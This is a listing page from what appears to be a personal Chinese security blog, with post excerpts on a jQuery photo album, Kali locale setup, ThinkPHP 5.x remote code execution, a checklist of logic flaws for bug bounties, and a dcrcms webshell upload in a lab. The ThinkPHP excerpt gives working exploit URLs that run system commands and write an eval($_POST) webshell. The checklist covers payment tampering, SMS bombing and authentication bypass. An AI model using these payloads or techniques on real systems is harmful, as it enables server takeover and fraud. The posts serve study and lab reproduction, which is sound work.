首页
关于
壁纸
友情链接
Search
1
三丰云:免费虚拟主机和云服务器!!!
6,764 阅读
2
本地部署deepseek
5,527 阅读
3
记一次简单的渗透测试
5,364 阅读
4
国漫崛起-《哪吒2》
5,323 阅读
5
文件上传漏洞
4,702 阅读
默认分类
登录
Search
白羊
累计撰写
53
篇文章
累计收到
92
条评论
首页
栏目
默认分类
页面
关于
壁纸
友情链接
搜索到
53
篇与
的结果
2024-06-18
html+css+jquery实现网页相册
效果图如下代码:<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title></title> <style> body{ background-image: url(./image/lushan.jpeg); background-repeat: no-repeat; background-size: 100%; } .box{ text-align: center; display: flex; justify-content: center; align-items: center; margin-top: 50px; } .box_little{ width: 120px; height: 30px; border: 1px solid cornflowerblue; border-radius: 3px; background-color: aliceblue; padding-top: 3px; cursor: pointer; } .gekai{ width: 113px; height: 8px; border: 1px solid aliceblue; background-color: aliceblue; } .img_box{ width: 1000px; height: 500px; background-image: url("./image/lushan.jpeg"); position: absolute; bottom: 30px; border: 20px solid aliceblue; box-shadow: 10px 10px 5px 0px rgba(0, 0, 0, 0.75); background-size: cover; border-radius: 6px; } </style> <script src="./jquery-3.6.3.js"></script> </head> <body> <div class="box"> <div class="box_little" id="lushan"><a>庐山</a></div><div class="gekai"></div> <div class="box_little" id="taishan"><a>泰山</a></div><div class="gekai"></div> <div class="box_little" id="wugoshan"><a>武功山</a></div><div class="gekai"></div> <div class="box_little" id="hengshan"><a>衡山</a></div><div class="gekai"></div> <div class="box_little" id="huashan"><a>华山</a></div><div class="gekai"></div> <div class="box_little" id="henshan"><a>恒山</a> </div> <div class="img_box"> </div> <script> $(document).ready(function(){ $("#lushan").click(function(){ $(".img_box").css("background-image", "url('./image/lushan.jpeg')"); $("body").css("background-image","url('./image/lushan.jpeg')"); }); $("#taishan").click(function(){ $(".img_box").css("background-image","url('./image/taishan.jpeg')"); $("body").css("background-image","url('./image/taishan.jpeg')"); }); $("#wugoshan").click(function(){ $(".img_box").css("background-image","url('./image/wugoshan.jpeg')"); $("body").css("background-image","url('./image/wugoshan.jpeg')"); }); $("#hengshan").click(function(){ $(".img_box").css("background-image","url('./image/hengshan.jpeg')"); $("body").css("background-image","url('./image/hengshan.jpeg')"); }); $("#huashan").click(function(){ $(".img_box").css("background-image","url('./image/huashan.jpeg')"); $("body").css("background-image","url('./image/huashan.jpeg')"); }); $("#henshan").click(function(){ $(".img_box").css("background-image","url('./image/henshan.jpeg')"); $("body").css("background-image","url('./image/henshan.jpeg')"); }); }); </script> </body> </html>
2024年06月18日
8 阅读
0 评论
2 点赞
2024-05-19
ThinkPHP漏洞利用
thinkphp_5x_命令执行漏洞受影响版本包括5.0和5.1版本docker漏洞环境源码:本地环境搭建:thinkphp5.0.15+php5.6n+ apache2.0https://github.com/vulnspy/thinkphp-5.1.29http://www.thinkphp.cn/donate/download/id/1125.html利用system函数远程命令执行经验值http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami通过phpinfo函数写出phpinfo()信息经验值:http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1写入shellhttp://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST["zane"])?^>>shell.php 或者 http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=FUCK<?php @eval($_POST["zane"])?>使用菜刀连接'http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php 密码为zanehttp://127.0.0.1/middleware/thinkphp_5.0.15_full/test.php 密码为zane'以上就是关于ThinkPHP漏洞利用的详细内容
2024年05月19日
1,373 阅读
8 评论
29 点赞
2024-05-08
kali设置中文
kali设置中文进入root用户su - root输入命令后进到语言配置界面dpkg-reconfigure locales空格选中zh_CN.UTF-8 UTF-8,之后回车选中zh_CN.UTF-8 ,之后回车打开终端。输入reboot 重启使语言配置生效
2024年05月08日
2,240 阅读
0 评论
60 点赞
2024-04-18
SRC中的逻辑漏洞总结
SRC中的逻辑漏洞总结注册:短信轰炸验证码安全问题密码爆破邮箱轰炸用户任意注册、批量注册用户名枚举XSS(有框的地方就可以尝试插XSS)登录:短信轰炸、验证码安全问题、密码爆破、邮箱轰炸SQL注入撞库抓包把password字段修改为空值发送认证凭证替换、比如返回的数据包中包含账号,修改账号就能登录到其他账号Cookie仿冒修改返回包的相关数据,可能会登陆到其他的用户找回密码:短信邮箱轰炸、短信邮箱劫持重置任意用户账户密码、验证码手机用户未统一验证直接跳过验证步骤购买支付、充值(要利用抓包去仔细查看每一个可用的参数)交易金额、数量修改、更换支付模块(比如更换支付的模块金额)交易信息订单编码/导致信息泄露整数溢出,int最大值为2147483647,超过最大值修改充值账户支付绕过抽奖活动刷奖品、积分并发优惠卷、代金卷并发逻辑漏洞(burp批量获取优惠券)修改优惠券金额、数量订单信息订单信息遍历、泄露订单信息泄露导致用户信息泄露删出他人订单会员系统修改个人信息上传文件,上传带弹窗的html如遇上上传xlsx、docx,可能存在XXE,上传恶意的文档盲测图片上传也可能遇到imagereagick命令执行,上传恶意图片视频上传如果使用ffmpeg<3.2.4(视频按帧分割成图片),上传恶意avi盲测ssrf用户横向越权访问、遍历、导致用户信息泄露SQL注入、个人简历处存储XSS个人信息注册的名称也可以插入XSS传输过程明文传输账户密码修改信息处无session/token导致csrfPOST/COOKIE注入评论POST注入存储型XSS无session/token导致CSRF验证码问题万能验证码返回包中存在验证码删除验证码或者cookie中的值可以爆破账号密码短信轰炸一直重放删除修改cookie,重放数据包遍历参数发送数据包手机号后面加空格或者前面加其他的比如+86或者逗号分号等,然后重发数据包请求参数修改大小写,或者添加请求参数比如&id=1一个站的登录处可能做了防护,但是再找回密码处可能没有安全防护,或者在注册流程中没有安全防护,所以说多测试接口如果对手机号一天的次数进行了限制,还可以再发一次短信,DO intercept之后修改为成功回显水平越权主要登陆后还是修改参数,主要找到多个接口不断测试关注网页源代码,有时候会有表单,但被bidden(隐藏标签)给隐藏起来了,可以修改返回包然后尝试获取数据检测多个账号,主要分析请求参数数据泄露再找回密码处,填写数据后抓包查看返回信息,有可能存在敏感数据返回任意用户密码重置目前大部分都是在修改密码处参数修改有些是前端验证支付逻辑漏洞边界值问题 : 正常的逻辑是用户购买商品,然后价格累加得到一个总价进行扣款。这个时候就会产生逻辑问题:如果说用户购买的商品是负数了,那么计算的总数就是负数。反过来钱给用户顺序执行缺陷:正常的逻辑是a-b-c-d 循环渐进的进行流程操作。这个时候就会产生逻辑问题:可以直接从中绕过某一个过程进入到下一步操作。如果说有一项是支付的操作,那么也就会产生支付绕过,如果说有一项是验证机制,就会绕过验证直接进入下一步。金额直接传输导致篡改:直接对下单的金额进行修改值,这里可以使用fd或者burp抓包确定支付之后还可以加入购物车:把商品放入购物车点击下单支付,会跳转到微信,支付宝等第三方支付平台。这个时候还可以继续在购物车中加入商品,支付结束之后,商家发放的商品是现在的购物车里面的东西。请求重放:购买成功之后,继续重放请求,可以让购买的商品一直增加。购买成功之后,会有一个银行对商户网站跳转的过程,如果反复进行操作,有几率会导致商品反复购买和增加,但是不需要付更多的钱。请求参数干扰:金钱做了签名认证之后,修改后不通过,但是在里面仍然会有一个参数对金额产生影响导致问题产生。订单替换:订单替换发生在支付之后的事件处理,同时向服务器发起二次支付请求一个多一个少,支付金额少的,然后支付之后进行替换,告知服务器订单支付完成,并且过程可以反复的回放。欺诈:需要两个收款人,一个是正常的商家,一个是伪造的商家单位替换:产生在paypal类似的国际支付的场景。用户替换:在支付过程中发生用户替换现象,首先登陆自己的账户,然后取得另外一个人的账户名等有效信息,在业务流程中用对方的用户名替换自己的用户名,用对方的余额购买完成后,再替换自己的账户名,这样就形成别人的钱买自己的东西强制攻击:强制攻击发生在暴力破解的情况下,如果一个商家运用一个自己的网店,接入第三方支付接口,由于设计上的不当导致商家与第三方支付约定的密钥Key可以单独被MD5加密,导致可以使用MD5碰撞技术对密钥进行破解,攻击者可以设计简单的密钥加密信息使得MD5加密是可以用MD5碰撞技术进行暴力破解。秘钥泄漏:内置支付功能的app为了设计上的方便有可能会把Md5或者是RSA的私钥泄漏导致攻击者反编译apk之后获取密钥信息使得交易信息可以被篡改。函数修改:apk反编译之后的函数修改,可能导致商家在最后一步向支付方提交订单时未验证信息的准确性,仍然被篡改。heart bleed:SSL(安全套接层)协议是使用最为普遍网站加密技术,而OpenSSL则是开源的 SSL 套件,为全球成千上万的web服务器所使用。Web服务器正是通过它来将密钥发送给访客然后在双方的连接之间对信息进行加密。URL中使用 https打头的连接都采用了SSL加密技术。在线购物、网银等活动均采用SSL技术来防止窃密及避免中间人攻击。该漏洞被归为缓冲过度读取。缓冲过度读取错误是软件可以读取比应该被允许还多的数据。漏洞让特定版本的openSSL成为无需钥匙即可开启的“废锁”,入侵者每次可以翻检户主的64K信息,只要有足够的耐心和时间,就可以翻检足够多的数据,拼凑出户主的银行密码、私信等敏感数据。产生原因:数据在传输的两端是不加密的。一些数据如果在传输过程中不加密则会泄露个人数据等信息。修改返回包的越权修改手机号一般的逻辑为:认证原手机号-> 填写新手机号-> 提交修改如果在下一步操作时,没有校验上一步的认证是否成功时,就会存在逻辑缺陷绕过比如在进行第一步认证原手机号时,随意输入验证码,将response包中的相关字段进行修改,比如0改成1,false改成true,即可绕过第一步验证,进入填写新手机号界面,如果第三步提交修改时没有验证第一步的结果,就会造成逻辑漏洞登录绕过部分网站的身份验证放在了前端,因此只需要将response包中的相关字段进行修改,比如0改成1,false改成true,就可以登录任意用户账号水平越权遍历ID在一些请求中,GET和POST中有明显的ID数字参数(手机号、员工号、账单号、银行卡号、订单号等等),可以尝试进行遍历,如果程序没有对当前权限进行判断,就会存在水平越权问题ID替换如果程序对用户标识进行了hash或者加密,而无法破解用的什么方式的话,就无法通过遍历ID来获取其它用户的信息了,此时可以尝试注册两个账号,通过替换两个ID加密后的值,判断程序是否对权限进行了验证,如果没有,也会存在越权问题垂直越权观察cookie中的session字段,可能某些字段或者参数代表身份,尝试修改
2024年04月18日
4,368 阅读
13 评论
93 点赞
2024-04-03
【CNVD-2020-27175】dcrcms 文件上传漏洞-A
漏洞介绍稻草人cms基于PHP+Sqlite/MySQL的开源简单小巧的免费企业网站系统本次基于vulfocus靶场进行复现漏洞复现后台地址:http://xxx.xxx.xxx.xxx/dcr/login.htm通过弱口令admin/123456登入系统添加新闻类(漏洞触发点在添加新闻处,添加新闻需要存在新闻分类)上传马子由于只能上传图片,将后缀更改为png重点数据包,将png后缀更改为php文件的上传路径并没有回显,但是它存在文件列表的查看功能,通过查找,找到了我们传上去的马子添加马子马子可以正常启动拿到flag
2024年04月03日
4,337 阅读
20 评论
63 点赞
1
...
7
8
9
...
11
0:00